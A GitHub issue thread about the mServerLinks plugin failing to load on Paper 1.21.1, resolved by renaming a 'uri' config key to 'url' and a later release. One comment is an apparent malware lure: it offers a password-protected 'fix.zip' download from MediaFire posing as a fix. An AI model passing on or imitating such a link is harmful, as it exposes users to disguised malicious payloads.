### ISSUE TITLE
Plugin fails to load

### ISSUE THREAD

**Issue by DlljsCodes** [powercasgamer/mServerLinks#19]
Currently running mServerLinks 0.0.9-2088c5d on Paper 1.21.1. When the server starts up, this error is thrown:
```
[06:26:14] [ServerMain/ERROR]: [BootstrapProviderStorage] Failed to run bootstrapper for plugins/mServerLinks-Paper-0.0.9-2088c5d.jar. This plugin will not be loaded.
java.lang.reflect.InvocationTargetException: null
	at java.base/jdk.internal.reflect.DirectConstructorHandleAccessor.newInstance(DirectConstructorHandleAccessor.java:72) ~[?:?]
	at java.base/java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:502) ~[?:?]
	at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:486) ~[?:?]
	at kotlin.reflect.jvm.internal.calls.CallerImpl$Constructor.call(CallerImpl.kt:41) ~[?:?]
	at kotlin.reflect.jvm.internal.KCallableImpl.callDefaultMethod$kotlin_reflection(KCallableImpl.kt:173) ~[?:?]
	at kotlin.reflect.jvm.internal.KCallableImpl.callBy(KCallableImpl.kt:112) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.kotlin.DataClassFieldDiscoverer$discover$2.complete(ObjectMapping.kt:131) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.kotlin.DataClassFieldDiscoverer$discover$2.complete(ObjectMapping.kt:125) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.objectmapping.ObjectMapperImpl.lambda$load$0(ObjectMapperImpl.java:56) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.objectmapping.ObjectMapperImpl.load0(ObjectMapperImpl.java:115) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.objectmapping.ObjectMapperImpl.load(ObjectMapperImpl.java:56) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.objectmapping.ObjectMapperFactoryImpl.deserialize(ObjectMapperFactoryImpl.java:230) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.serialize.TypeSerializer.deserialize(TypeSerializer.java:96) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.serialize.MapSerializer.deserialize(MapSerializer.java:71) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.serialize.MapSerializer.deserialize(MapSerializer.java:35) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.objectmapping.ObjectMapperImpl.load0(ObjectMapperImpl.java:76) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.objectmapping.ObjectMapperImpl.load(ObjectMapperImpl.java:56) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.objectmapping.ObjectMapperFactoryImpl.deserialize(ObjectMapperFactoryImpl.java:230) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.AbstractConfigurationNode.get0(AbstractConfigurationNode.java:203) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.AbstractConfigurationNode.get(AbstractConfigurationNode.java:161) ~[?:?]
	at dev.mizule.mserverlinks.libs.org.spongepowered.configurate.ConfigurationNode.get(ConfigurationNode.java:521) ~[?:?]
	at mServerLinks-Paper-0.0.9-2088c5d.jar/dev.mizule.mserverlinks.core.config.ConfigurationContainer.load(ConfigurationContainer.java:124) ~[mServerLinks-Paper-0.0.9-2088c5d.jar:?]
	at mServerLinks-Paper-0.0.9-2088c5d.jar/dev.mizule.mserverlinks.paper.mServerLinksBootstrapper.setupConfigs(mServerLinksBootstrapper.java:72) ~[mServerLinks-Paper-0.0.9-2088c5d.jar:?]
	at mServerLinks-Paper-0.0.9-2088c5d.jar/dev.mizule.mserverlinks.paper.mServerLinksBootstrapper.bootstrap(mServerLinksBootstrapper.java:82) ~[mServerLinks-Paper-0.0.9-2088c5d.jar:?]
	at io.papermc.paper.plugin.storage.BootstrapProviderStorage$1.load(BootstrapProviderStorage.java:36) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at io.papermc.paper.plugin.storage.BootstrapProviderStorage$1.load(BootstrapProviderStorage.java:24) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at io.papermc.paper.plugin.entrypoint.strategy.modern.ModernPluginLoadingStrategy.loadProviders(ModernPluginLoadingStrategy.java:117) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at io.papermc.paper.plugin.storage.SimpleProviderStorage.enter(SimpleProviderStorage.java:38) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at io.papermc.paper.plugin.entrypoint.LaunchEntryPointHandler.enter(LaunchEntryPointHandler.java:40) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at io.papermc.paper.plugin.entrypoint.LaunchEntryPointHandler.enterBootstrappers(LaunchEntryPointHandler.java:30) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at net.minecraft.server.Bootstrap.bootStrap(Bootstrap.java:65) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at net.minecraft.server.Main.main(Main.java:124) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at io.papermc.paper.PaperBootstrap.boot(PaperBootstrap.java:21) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at org.bukkit.craftbukkit.Main.main(Main.java:281) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
	at io.papermc.paperclip.Paperclip.lambda$main$0(Paperclip.java:42) ~[app:?]
	at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]
Caused by: java.lang.NullPointerException: Parameter specified as non-null is null: method dev.mizule.mserverlinks.core.config.Link.<init>, parameter url
	at mServerLinks-Paper-0.0.9-2088c5d.jar/dev.mizule.mserverlinks.core.config.Link.<init>(Config.kt) ~[mServerLinks-Paper-0.0.9-2088c5d.jar:?]
	at mServerLinks-Paper-0.0.9-2088c5d.jar/dev.mizule.mserverlinks.core.config.Link.<init>(Config.kt:69) ~[mServerLinks-Paper-0.0.9-2088c5d.jar:?]
	at java.base/jdk.internal.reflect.DirectConstructorHandleAccessor.newInstance(DirectConstructorHandleAccessor.java:62) ~[?:?]
	... 35 more

```

**Comment by TrymenT-AlphA** [comment]
123

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DlljsCodes** [comment]
Dang, I didn't think spam comments in GitHub Issues were possible...

**Comment by powercasgamer** [comment]
Whoops, this was an oversight in my #10 PR. I'll push out an update soon to automatically update this, in the mean time you can change "uri" to "url" in your config

```diff
links {
  example {
    name="<red>Example"
-   uri="https://example.com"
+   url="https://example.com"
  }
}
```

**Comment by DlljsCodes** [comment]
That fixed it. Thank you!

Leaving the issue open until the update has been released.

**Comment by powercasgamer** [comment]
Fixed in #20, keeping this open till release, which should be sometime this week. Apologies for the delays.

**Comment by powercasgamer** [comment]
https://github.com/powercasgamer/mServerLinks/releases/tag/v0.0.10 should fix it
